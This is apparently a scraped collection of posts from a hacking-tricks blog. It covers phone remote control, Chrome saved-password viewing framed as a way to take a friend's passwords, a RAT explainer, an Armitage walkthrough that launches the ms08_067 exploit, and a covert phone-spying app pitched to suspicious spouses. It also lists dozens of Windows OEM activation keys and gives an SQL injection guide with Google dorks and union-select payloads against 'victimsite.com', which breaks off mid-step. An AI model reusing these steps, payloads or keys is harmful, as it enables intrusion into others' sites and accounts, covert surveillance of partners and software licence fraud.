Control Your Android Phone From Your Computer


Hello friends, hope you are all fine. Nowadays most of us use android phone and me too so I searched through online to control my mobile from my computer, in that way I found one way. You can ask me is it possible and even simple? The Answer is YES! You can by an simple application which is free in the market called “Airdroid”.

Why I choose this?
 There are many free applications in android market to control and connect your android phone with PC without cable. But the main problem is they uses more memory from your phone so it causes mobile hanging and slows down our phone software processing speed. In this way “AIRDROID” uses very less memory to process this so there is nothing affected by this application.

http://www.2012-tricks.blogspot.com


Steps to follow:
Step 1: Download and Install “AirDroid” application on your Android Device from android market, its fully free application.



Step 2 : After installing Airdroid on your device simply Run it and you will see the screen like the above page. In this you can see the URL(ip address)  and password field.
Step 3: Now you are successfully installed your apps, and ready to connect with you computer. For this you need a web browser.
Step 4: Then open your browser and enter the URL(ip address with port) you see in your Airdroid Device App in your web browsers field like below and hit enter.



Step 5: After you hit enter the new Airdroid will page and prompt you to enter PASSWORD, So you have you enter your password which you seen in your Airdoid Device application. Then click Login.
Step 6 : Now you are ready to Control you android device from your PC. Just control everything. ….

See you in the next post.  Thanks for watching this friends…..



Read more ...

Backtrack 5 Wireless Penetration Testing Begineer's Ebook





backtrack ebook



Backtrack 5 Wireless Penetration Testing Beginner's Guide will take you through the journey of becoming a Wireless hacker. You will learn various wireless testing methodologies taught using live examples, which you will implement throughout this book. The engaging practical sessions very gradually grow in complexity giving you enough time to ramp up before you get to advanced wireless attacks.



This book will take you through the basic concepts in Wireless and creating a lab environment for your experiments to the business of different lab sessions in wireless security basics, slowly turn on the heat and move to more complicated scenarios, and finally end your journey by conducting bleeding edge wireless attacks in your lab.




List Of Topic Covered In This Book



  • Create a Wireless Lab for conducting experiments

  • Monitor the air and sniff wireless packets

  • Bypass WLAN authentication mechanism

  • Crack WEP/WPA/WPA2 encryption mechanisms

  • Break into a WLAN network using infrastructure flaws

  • Break into a Wireless client such as a laptop

  • Advanced attacks such as Man-in-the-Middle attacks and Evading WIPS

  • Conduct wireless penetration test in a methodical way










Read more ...

More Simple Way To View Saved Password in Google Chrome



google chrome hacked

Previously i had showed you how to view saved password in google chrome. In this post i will show you same thing but with different method suggested by one of reader of Cool Hacking Trick name Palash. This trick is simple yet very powerfull  to view or hack saved password in google chrome. It does not  matter for which website the password is saved it will work on all of them. It will work on Facebook, Gmail, Yahoo, twitter and many more. If you get your hands on your friend computer  you can hack their password with this simple little trick. It does not require any software or addons to be installed on your computer. Lets get started.



How to view saved password in google chrome ?




  1. Open Google Chrome

  2. Go to Settings (Its on the Right Corner)

  3. Then Click on Advance Settings

  4. Scroll Down and their will be password and forms from their click on Manage saved password.

  5. Then list of all websites whose passwords are saved on browser will be listed.

  6. Click on show to view those passwords

  7. Enjoy!!




You may also like to read Below Articles







Read more ...

What is RAT (Remote Access Trojan) ?



RAT


RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.





 What is RAT ?


As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.


 What You can do with RAT ?


Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:


  • Infecting Files

  • Installing Keyloggers

  • Controlling Computer

  • Remotely start webcam, sounds, movies etc

  • Using your PC to attack Website (DDOS)

  • View Screen




 Harmless RAT or Good RAT



As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.


 Some Commonly Used RAT




  • ProRAT

  • CyberGate RAT

  • DarkComet RAT








Read more ...

New Facebook Smiley Codes for Chat



facebook smiley

In my previous facebook post i had posted about Facebook Chat Trick and Facebook smiley addon. In this post i will share with you guys some new facebook smiley codes which you can paste in your chat box to get cool smiley faces like angel, gift, love, angry, laugh, wine etc. check the codes below.


Code For Facebook Smileys




[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak ]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface] ]
[[f9.lying]]



You May Also Like To Check This







Read more ...

Tips and Tricks

A new section is born, Tips and Tricks, a new page of guides (usually called howtos) for Lubuntu where you'll find simplified steps to do amazing things. We start with an article about how to bring Exposé effect to our desktop using either the keyboard or the mouse. In the future this section wil grow with more tricks, so if you made Lubuntu take a fancy, usefull and rare behaviour, please, share
Read more ...

Learn how to use Armitage in Backtrack 5













Introduction




  • Armitage is the GUI based tool for Metasploit , that shows the targets , exploits in the framework.



Features of Armitage 



  • With Armitage you can scan all the alive host on the network .

  • Armitage recommends exploits and will optionally run active checks to tell you which exploits will work. 

  • If these options fail, use the Hail Mary attack to unleash Armitage's smart automatic exploitation against your targets.

  • When you successfully exploit the target , 
    With the click of a menu you will escalate your privileges, log keystrokes, browse the file system, and use command shells.




Requirements 




  • Latest Metasploit framework 4.3 or above 

  • Oracle Java 1.7






Step 1 : Open armitage on Backtrack 5.

  • Click on Backtrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > armitage

  • See the below image for more details how to open armitage n Backtrack 5 r2.




                            



Step 2 : Connect Armitage 

  • Click on the connect Button .

  • See the below image for more details -


                                       






Step 3 : Connecting Armitage 




  • It takes few minutes to connect . So have some patience.


                                          

Step 4 :  Armitage Window 


  • Here is your armitage window shown below - 


                                            




  • Armitage has 3 panels : -



  1. TARGET PANEL : It represents the computer ip address and other information .

  2. MODULE PANEL: It shows the auxiliary,exploit,payload and post.

  3. TABS PANEL
    Armitage opens each dialog, console, and table in a tab below the module and target panels. Click the X button to close a tab
                             


Step 5 : Find the alive host on the Network 


  • In this step we have to search for the host .

  • Under the Nmap Scan, select the  option > Quick Scan (OS detect)

  • See the below image for more details .


                                    


  • Here you have to enter the scan range . 

  • Here 192.168.222.0/24  this is  class C range.

  • Example image shown below -


                                    


  • Your Scan is complete now .

  • If the nmap scan find the alive host , then it will be shown on your Target Panel .(As shown  Below )

  • See the below image for more details -


                                   

Step 6 : Finding Attacks 


  • Click on the Attacks > Find Attacks .

  • It will find the most suitable attack for host shown in the Target Panel.

  • See the image shown below -


                                       

  • When  attack analysis finished , it informs with a message shown in the image below -


                                        

Step 7 : Set the vulnerebility

  • Right click on the host 

  • Click on smb 

  • Select the ms08_067_netapi  vulnerebility .


                                         




  • Click on the checkbox - Use  a reverse connection .

  • Now click on the Launch Button .


                                          


Step 8 :




  • If the target host is vulnerable then its color changes to red .That means we can attack into the computer system.


                                          

Read more ...

Create A Run Command


Today, I'm going to share a simple trick about Windows Run utility. Do you use 'Run' in windows
for opening your applications easily and fastly? Yes, you use it, if I
am not wrong, because many of us use it, you put a already created
command, hit enter and a the desired application opens. So, what you
think? Want to create your own command? Ok, read on to find how to
create one for your favorite applications.



Actually, Run on Windows Operating System
is something like a simple application that allows to open an
application directly without navigating to its actual location and
double-clicking on that executable file.

Let's move on to Create a Run Command
The process is very easily, just follow these simple steps carefully,



  • Open Run ( Navigate to Start Menu, then click on 'Run' )

  • In the box type the following command- 'regedit', it will open the window's registry, it is a place where various configurations of the Operating System are stored. Please don't mess with Window Registry, if you don't know a lot about it.






  • Then go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Apps Path

  • In the Apps Path, you will see a huge list of executable(.exe) files like this:









  • So, after that right click on Apps Path, then New, choose 'Key'










  • Give it a name like hacker.exe or anything that feels good to you.

  • Right Click the (Default) under Name, and click on Modify

  • Change the 'Value data' to the path of the .exe file which you are going to run, like 'C:\Program Files\Internet Explorer\IEXPLORE.EXE






  • Now Create a new String Value by just Right-Clicking, then 'New', choose 'String Value', named it 'Path', after then, open it, and paste the same link which you have put in the 'Value Data' of (Default) String, i.e, 'C:\Program Files\Internet Explorer\IEXPLORE.EXE'. You will see something like this.








  • Now, all is done, you just have to open 'Run' once again and type the name of your command i.e, hacker.exe and the appointed application will open.


It's very easy to do, you can create many personal 'Run' command
using this and use it, comment if you get any type of error or else.

Read more ...

How to Upgrade Windows 7 to Any Higher Version for Free


Previously I wrote about Windows 8 now i m going to show you how can someone upgrade Window 7 to higher version















You
bought a new computer with a pre-installed Starter/Home
Premium/Professional (Genuine) version of Windows 7 and want to upgrade
to Professional or Ultimate for free in as few as 10 minutes .



Your
pre-installed version of Windows 7 actually includes all files that are
necessary to perform an in-place (local) upgrade without downloading
anything from the internet. One simply needs unlocking features included
in higher versions.




Here's what you need to do: 






To
upgrade from one edition of Windows 7 to another edition of Windows 7,
use Windows Anytime Upgrade. On your PC, open Windows Anytime Upgrade by
clicking the
 Start button, typing Windows Anytime Upgrade in the search box, and then clicking Windows Anytime Upgrade in the list of results. You will be presented with a screen offering 2 options, one of them suggesting you have a valid Windows Anytime Upgrade key.

Once the key has been copied
into the appropriate field, it will be verified by MS and the upgrade
process will take place. The whole process actually doesn't last longer
than 10 minutes, your computer will reboot once or twice. Upon restart,
you will notice it now runs a genuine higher version of Windows 7.


* You can use Windows Anytime
Upgrade to upgrade from a 32-bit version of Windows 7 to a 32-bit
version of Windows 7 and from a 64-bit version of Windows 7 to a 64-bit
version of Windows 7, but you can’t upgrade from a 32-bit version of
Windows 7 to a 64-bit version of Windows 7 or vice versa.


* Windows Anytime Upgrade isn’t available in all editions of Windows 7 - obviously not in Ultimate version.



Howto
------
Click the Start button, type Windows Anytime Upgrade in the search box, and then clicking Windows Anytime Upgrade in the list of results. You will be presented with a screen offering 2 options, one of them suggesting you have a valid Windows Anytime Upgrade key.

Once the key has been copied into the appropriate field, it will be verified by MS and the upgrade process will take place. The whole process actually doesn't last longer than 10 minutes, your computer will reboot once or twice. Upon restart, you will notice it now runs a Genuine higher version of Windows 7 !

Keys are not brand specific. Any key will work for any OEM(Original equipment manufacturer).

Online PID checker by Freestyler: http://d-fault.nl/pidcheck/

Updated: 10-04-2010
Unknown Home Prem: XXXXX-OEM-8992687-00202
Unknown Pro: XXXXX-OEM-8992671-00101
Kraftway Pro: XXXXX-OEM-8992671-00158


STARTER
(OEM-8992752) (OEM-8992707)
=====================

RDJXR-3M32B-FJT32-QMPGB-GCFF6 --- XXXXX-OEM-8992752-30004 --- ACER/GATEWAY/PACKARD
6K6WB-X73TD-KG794-FJYHG-YCJVG --- XXXXX-OEM-8992752-30005 --- ASUS (Eee)
6PB94-MC2C6-4F37H-KTJ32-PF2PT --- XXXXX-OEM-8992707-00097 --- CASPERERA
36Q3Y-BBT84-MGJ3H-FT7VD-FG72J --- XXXXX-OEM-8992707-00082 --- DELL
4FRH4-WQDGJ-M9HRY-K73D8-RGT3C --- XXXXX-OEM-8992707-00228 --- EXPER
RH98C-M9PW4-6DHR7-X99PJ-3FGDB --- XXXXX-OEM-8992752-30008 --- HP
PMXH9-M23P9-QJJMB-2FWRC-7CDKP --- XXXXX-OEM-8992752-30007 --- FUJITSU
273P4-GQ8V6-97YYM-9YTHF-DC2VP --- XXXXX-OEM-8992752-30169 --- LENOVO/IBM
22P26-HD8YH-RD96C-28R8J-DCT28 --- XXXXX-OEM-8992707-00153 --- LENOVO/IBM
2K8WH-JVQDM-C9HVC-YR2XC-8M76G --- XXXXX-OEM-8992752-30065 --- MEDION
2W4DJ-JFFJV-DMCPP-2C3X8-883DP --- XXXXX-OEM-8992707-00121 --- MSI
2YKPV-BFXFW-X8GJQ-9KQFF-KCXGD --- XXXXX-OEM-8992752-30271 --- MSI
2XGHP-9TQK2-8CF28-BM2P2-8FRX8 --- XXXXX-OEM-8992752-30269 --- NOKIA
344HQ-3YHDT-C7VCT-BDPBV-4KTR3 --- XXXXX-OEM-8992707-00192 --- OLIDATA
PV9BD-YBRX6-CTMG6-CCMJY-X8XG7 --- XXXXX-OEM-8992752-30013 --- SAMSUNG
32J2V-TGQCY-9QJXP-Q3FVT-X8BQ7 --- XXXXX-OEM-8992707-00016 --- SONY
TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ --- XXXXX-OEM-8992752-30015 --- TOSHIBA
7W842-2HCPJ-BC3MJ-B79K6-TD2HQ --- XXXXX-OEM-8992752-30214 --- VILIV
32TF3-PT6YV-V6GCK-RR8GM-VM4QG --- XXXXX-OEM-8992707-00180 --- ?????



HOME BASIC
(OEM-8992752)
=====================

MB4HF-2Q8V3-W88WR-K7287-2H4CP --- XXXXX-OEM-8992752-50004 --- ACER/GATEWAY/PACKARD
89G97-VYHYT-Y6G8H-PJXV6-77GQM --- XXXXX-OEM-8992752-50005 --- ASUS
36T88-RT7C6-R38TQ-RV8M9-WWTCY --- XXXXX-OEM-8992752-50258 --- DELL
8W3JQ-BP2HY-F47QX-6CQ94-2BKQB --- XXXXX-OEM-8992752-50007 --- FUJITSU
DX8R9-BVCGB-PPKRR-8J7T4-TJHTH --- XXXXX-OEM-8992752-50008 --- HP
22MFQ-HDH7V-RBV79-QMVK9-PTMXQ --- XXXXX-OEM-8992752-50213 --- LENOVO/IBM
2P6PB-G7YVY-W46VJ-BXJ36-PGGTG --- XXXXX-OEM-8992752-50013 --- SAMSUNG
YV7QQ-RCXQ9-KTBHC-YX3FG-FKRW8 --- XXXXX-OEM-8992752-50014 --- SONY
9DBMT-GXRWM-6Q9Y3-WMYM8-FJCBW --- XXXXX-OEM-8992752-50165 --- TONGFANG
9H4FH-VD69Y-TGBD2-4PM4K-DRMMH --- XXXXX-OEM-8992752-50015 --- TOSHIBA
2TY7W-H4DD4-MB62F-BD9C3-88TM6 --- XXXXX-OEM-8992752-50179 --- ?????
2Q4QP-8P4MD-47YBP-7TXX9-FKDRM --- XXXXX-OEM-8992752-50229 --- ?????



HOME PREM
(OEM-8992687)
=====================
VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 --- XXXXX-OEM-8992687-00006 --- ACER/GATEWAY/PACKARD
38JTJ-VBPFW-XFQDR-PJ794-8447M --- XXXXX-OEM-8992687-00304 --- ADVENT
V3Y2W-CMF9W-PGT9C-777KD-32W74 --- XXXXX-OEM-8992687-00008 --- ALIENWARE
2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR --- XXXXX-OEM-8992687-00007 --- ASUS
7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG --- XXXXX-OEM-8992687-00118 --- ASUS (Eee)
6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 --- XXXXX-OEM-8992687-00095 --- DELL
83K3W-QH8JT-T7KBY-9FQB6-V9R8H --- XXXXX-OEM-8992687-00191 --- DELL
C6MHH-TRRPT-74TDC-FHRMV-XB88W --- XXXXX-OEM-8992687-00009 --- FUJITSU
39QDH-D7MHH-WDMTD-TM2R9-KM7DB --- XXXXX-OEM-8992687-00258 --- HCL
4FG99-BC3HD-73CQT-WMF7J-3Q6C9 --- XXXXX-OEM-8992687-00010 --- HP
27GBM-Y4QQC-JKHXW-D9W83-FJQKD --- XXXXX-OEM-8992687-00249 --- LENOVO/IBM
38GRR-KMG3D-BTP99-TC9G4-BBDJJ --- XXXXX-OEM-8992687-00174 --- LG
2P2P9-CM3F8-FTV6P-PC7CX-8TFF7 --- XXXXX-OEM-8992687-00093 --- MEDION
4G3GR-J6JDJ-D96PV-T9B9D-M8X2Q --- XXXXX-OEM-8992687-00246 --- MSI
CQBVJ-9J697-PWB9R-4K7W4-2BT4J --- XXXXX-OEM-8992687-00015 --- SAMSUNG
HWDFB-YVFG4-3TJ7F-Q3WMT-7B6PH --- XXXXX-OEM-8992687-00138 --- SIRAGON
H4JWX-WHKWT-VGV87-C7XPK-CGKHQ --- XXXXX-OEM-8992687-00016 --- SONY
6B88K-KCCWY-4F8HK-M4P73-W8DQG --- XXXXX-OEM-8992687-00057 --- TOSHIBA
6GF36-P4HWR-BFF84-6GFC2-BWX77 --- XXXXX-OEM-8992687-00017 --- TOSHIBA
C23T3-9F2T2-FPWBM-XYMW2-272J9 --- XXXXX-OEM-8992687-00143 --- VIEWSONIC
2XPWB-Q64BJ-W8CT3-WJTWT-4DQ99 --- XXXXX-OEM-8992687-00267 --- ?????
TTJQ7-4PFJC-6JFJ8-B22VD-VXW88 --- XXXXX-OEM-8992687-00013 --- ?????
7K377-DVP2Q-YGWJG-3M3G7-RBCDP --- XXXXX-OEM-8992687-00194 --- ?????
3743C-T6892-B4PHM-JHFKY-4BB7W --- XXXXX-OEM-8992687-00202 --- ?????



PROFESSIONAL
(OEM-8992671)
=====================

YKHFT-KW986-GK4PY-FDWYH-7TP9F --- XXXXX-OEM-8992671-00004 --- ACER/GATEWAY/PACKARD
4CFBX-7HQ6R-3JYWF-72GXP-4MV6W --- XXXXX-OEM-8992671-00188 --- ALIENWARE
2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW --- XXXXX-OEM-8992671-00407 --- ASUS
32KD2-K9CTF-M3DJT-4J3WC-733WD --- XXXXX-OEM-8992671-00524 --- DELL
PT9YK-BC2J9-WWYF9-R9DCR-QB9CK --- XXXXX-OEM-8992671-00007 --- FUJITSU
2QTV2-3CMPP-FQBYK-GRD62-D7XMW --- XXXXX-OEM-8992671-00501 --- HCL
74T2M-DKDBC-788W3-H689G-6P6GT --- XXXXX-OEM-8992671-00008 --- HP
32HPJ-4XRDR-424C8-DYQM9-GM768 --- XXXXX-OEM-8992671-00158 --- KRAFTWAY
237XB-GDJ7B-MV8MH-98QJM-24367 --- XXXXX-OEM-8992671-00437 --- LENOVO/IBM
2QGXM-V9W9W-6Q7MR-64C4X-R26CV --- XXXXX-OEM-8992671-00207 --- LG ?
GMJQF-JC7VC-76HMH-M4RKY-V4HX6 --- XXXXX-OEM-8992671-00013 --- SAMSUNG
H9M26-6BXJP-XXFCY-7BR4V-24X8J --- XXXXX-OEM-8992671-00014 --- SONY
7RQGM-4BJBD-GM2YY-R2KTT-43HG8 --- XXXXX-OEM-8992671-00282 --- STEG
2V8P2-QKJWM-4THM3-74PDB-4P2KH --- XXXXX-OEM-8992671-00137 --- TOSHIBA
6JKVQ-WJTWW-JVPRB-77TGD-2DV7M --- XXXXX-OEM-8992671-00339 --- WORTMANN
2W3CX-YD4YJ-DF9B2-V27M6-77GMF --- XXXXX-OEM-8992671-00503 --- ?????
BV4Y4-DVXDT-3FC64-X2QR7-DW82M --- XXXXX-OEM-8992671-00468 --- ?????
6BJ27-DVBFF-VKQC8-7JPQP-TJKYY --- XXXXX-OEM-8992671-00215 --- ?????
6FWJ7-TDRCV-BYTP3-JWB98-9J64J --- XXXXX-OEM-8992671-00211 --- ?????
W2PMW-T7DBH-YHKRM-DXXF6-KP4KT --- XXXXX-OEM-8992671-00015 --- ?????
862R9-99CD6-DD6WM-GHDG2-Y8M37 --- XXXXX-OEM-8992671-00205 --- ?????
7QY32-TQCBJ-G7MC8-Y4PGF-7TGB8 --- XXXXX-OEM-8992671-00284 --- ?????
36KXM-JVMP6-88WMK-YCCGV-YFDVX --- XXXXX-OEM-8992671-00230 --- ?????
CRYGF-JG347-QPJKH-BR82M-3MQP3 --- XXXXX-OEM-8992671-00101 --- ?????


ULTIMATE
(OEM-8992662)
=====================

FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 --- XXXXX-OEM-8992662-00006 --- ACER/GATEWAY/PACKARD
VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD --- XXXXX-OEM-8992662-00008 --- ALIENWARE
2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G --- XXXXX-OEM-8992662-00173 --- ASUS
342DG-6YJR8-X92GV-V7DCV-P4K27 --- XXXXX-OEM-8992662-00400 --- DELL
9CW99-79BBF-D4M3X-9BK9M-4RPH9 --- XXXXX-OEM-8992662-00009 --- FUJITSU
MHFPT-8C8M2-V9488-FGM44-2C9T3 --- XXXXX-OEM-8992662-00010 --- HP
6K2KY-BFH24-PJW6W-9GK29-TMPWP --- XXXXX-OEM-8992662-00537 --- LENOVO/IBM (Re-released)
49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD --- XXXXX-OEM-8992662-00015 --- SAMSUNG
YJJYR-666KV-8T4YH-KM9TB-4PY2W --- XXXXX-OEM-8992662-00016 --- SONY
2WX6M-X2HKM-86X8X-2QD44-F3FGJ --- XXXXX-OEM-8992662-00481 --- ?????
78FPJ-C8Q77-QV7B8-9MH3V-XXBTK --- XXXXX-OEM-8992662-00366 --- ?????


Read more ...

Things to Know Before you Download Windows 8





Windows 8 Screen


Microsoft today unveiled the “release preview
version of Windows 8 which mostly indicates that the new Windows
operating system is feature-complete. Windows 8 Release Preview is
available as a free download and it is very likely that your existing
system specs are good enough to run Windows 8.


The System Requirements for Windows 8


According to this Windows 8 FAQ,
any machine equipped with 1 GB of RAM, 16 GB of hard disk space and 1
GHz processor should be able to handle Windows 8. The minimum RAM
requirements are 2 GB in case you would like to install the 64-bit
version of Windows 8.


Should you download Windows 8 Setup or the ISO Image?



As you may have noticed on the Windows 8 download page, the installation of Windows 8 can be done in two ways.


  1. You can either take the easiest route and download the Windows 8 Setup program – that’s also the default option.

  2. Alternatively, you can download ISO Images of Windows 8.



If you are planning to install Windows 8 on your existing computer,
either on a different partition (dual-boot) or just want to upgrade from
an older version of Windows to Windows 8, the default Setup program is a
good choice.


Please note that that your installed software programs will only be
preserved if you are upgrading from Windows 7 to Windows 8. If your
planning to install Windows 8 on top of Windows XP or Vista, only the
files will be preserved but not the various software programs that you
may have on the disk.


The Windows 8 ISO image may be more handy in other situations like:


  1. Your computer has an
    x64 processor but is currently running the 32-bit version of Windows. If
    you want to install the 64-bit version of Windows 8, download the
    64-bit ISO.

  2. You want to install Windows 8 on your Mac (iMac or Macbook) using Boot Camp software.

  3. You want to install Windows 8 on multiple computers. In that case, you can download the ISO once, create a bootable DVD and boot the other systems using this newly created Windows 8 disk.

  4. You plan to run Windows 8 as a Virtual Machine inside your existing copy of Windows.

  5. You are running Windows XP.



The universal product key for Windows 8 is TK8TP-9JN6P-7X7WW-RFFTV-B7QPF.


Will my software programs run inside Windows 8?


Before grabbing the ISO image of Windows 8, quickly run this setup utility and
it will show a list of all software programs and hardware drivers on
your system that are compatible with Windows 8. Alternatively, you can
visit this page to see a list of all known software and hardware devices that are found to be working with Windows 8.


How should I go about installing Windows 8?


You can have Windows 8 on your computer in three ways – you can install Windows 8 side-by-side (also
known as dual-boot), as a virtual machine (so that it runs inside your
existing Windows just like any other software) or you can have Windows 8
as your primary OS (there’s no going back from here).


If you just want to try out Windows 8   but without modifying any of your existing set-up, the safest bet is to use a Virtual Machine.
If you have a vacant disk partition or don’t mind creating one (it’s
easy), go for the dual-boot option. Else, if you have a spare computer,
you can consider upgrading to Windows 8 overwriting the previous installation of Windows.


Also note that if you are upgrading from Windows 8 Consumer Preview to
the new Windows 8 Release Preview, none of your installed programs,
files and account settings will be preserved though everything would be
moved to the windows.old folder.


Read more ...

How to monitor or track any Cell Phone





How to monitor or track any cell phone?


There is no denying that cell phones are part and parcel of current
times and smartphones with a whole gamut of features are hot favorites.
Mobile phones are being profusely used for a variety of functions and
have become repositories of so much personal and professional
information.

If and when people can get at a
cell phone’s data, they acquire almost
complete knowledge about the owner! But getting at a mobile’s data is
more easily said than done.

People cannot keep grabbing furtively at a phone and going through the
information stored in it! An invisible and silent way to transmit all
the cell phone related activities and data, including deleted ones is
needed. This is the basic idea behind monitoring or tracking cell phones
using cell phone spy applications.



How to monitor a cell phone most effectively?


Monitoring software for cell phones is available for a variety of mobile
models and operating systems. Such software, like the widely used
Mobile Spy can be quickly installed on any cell phone that has to be
monitored. The apps are thoroughly camouflaged and are designed to run
undetected in the mobile’s backdrop without intruding on the
instrument’s activities.







Setting up cell phone monitoring software


The mobile tracking app installation typically involves a simple
procedure. The user first creates an account for himself or herself on a
server designated by the app at the time of buying. After this, the
user has to physically pick up the cell phone to be monitored and set up
the mobile monitoring software on it.

As part of this step, he is also asked to select the data to be tracked.


Immediately after the installation process is completed, the app becomes
active and runs whenever the cell phone is on. It tracks the required
data, encrypts it for security and then transmits it to the server
account. User can view and use the logs recorded in the server by
accessing his account from anywhere, at anytime through a web browser.



Mobile data that becomes accessible with monitoring apps


Sophisticated monitoring apps for smartphones give many advanced options
apart from the fundamental ones such as call, SMS, email and chat
tracking and access to phone data like address book, video and picture
files and so on.

To encompass a wider scope for mobile tracking, the apps could have
location tracking of mobiles with GPS or cell ID, live overhearing of
calls and the mobile’s environment, live viewing of the phone’s screen,
permissions to block applications and lock device remotely, the ability
to limit phone usage timings, get current SIM details and many more
options.




Who can benefit from tracking mobiles?


Parents interested in watching over their kids, firms that want to
monitor their employee actions, husbands or wives doubtful about their
partner’s faithfulness and any persons who need evidence against someone
are the cases where mobile tracking is called for.

Some people use it as a data backup option on their own mobiles and some
use such apps as a precaution against mobile loss.

With mobile monitoring apps, anyone can acquire the power to track data
and activity related to cell phones and by collecting the necessary
information they can mitigate risks easily before any problems get
precipitated.

About The Author

Lucille J Cronk is a blogger enthusiastic about cell phone technology and other mobile applications.

Read more ...

Hacking website using SQL Injection -step by step guide


Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is
used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate
with the Database ,we are using SQL query. We are querying the database
so it is called as Query language.

Definition from Complete reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.


Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present .
Using this method an unauthorized person can access the database of
the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the
Vulnerable websites(hackable websites) using Google Dork list. google
dork is searching for vulnerable websites using the google searching
tricks. There is lot of tricks to search in google. But we are going
to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
Click Here To Donwload

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.
                       

Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:

site:www.victimsite.com inurl:index.php?id=

 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check
the vulnerability ,add the single quotes(') at the end of the url and
hit enter. (No space between the number and single quotes)

For eg:

http://www.victimsite.com/index.php?id=2'

 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '\'' at line 1


Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4

 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 

 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:


http://www.victimsite.com/index.php?id=2 order by 1--


Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence"
we can find the vulnerable part of the table. Replace the "order by
n" with this statement. And change the id value to negative(i mean
id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:


http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--


If the above method is not working then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--



It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
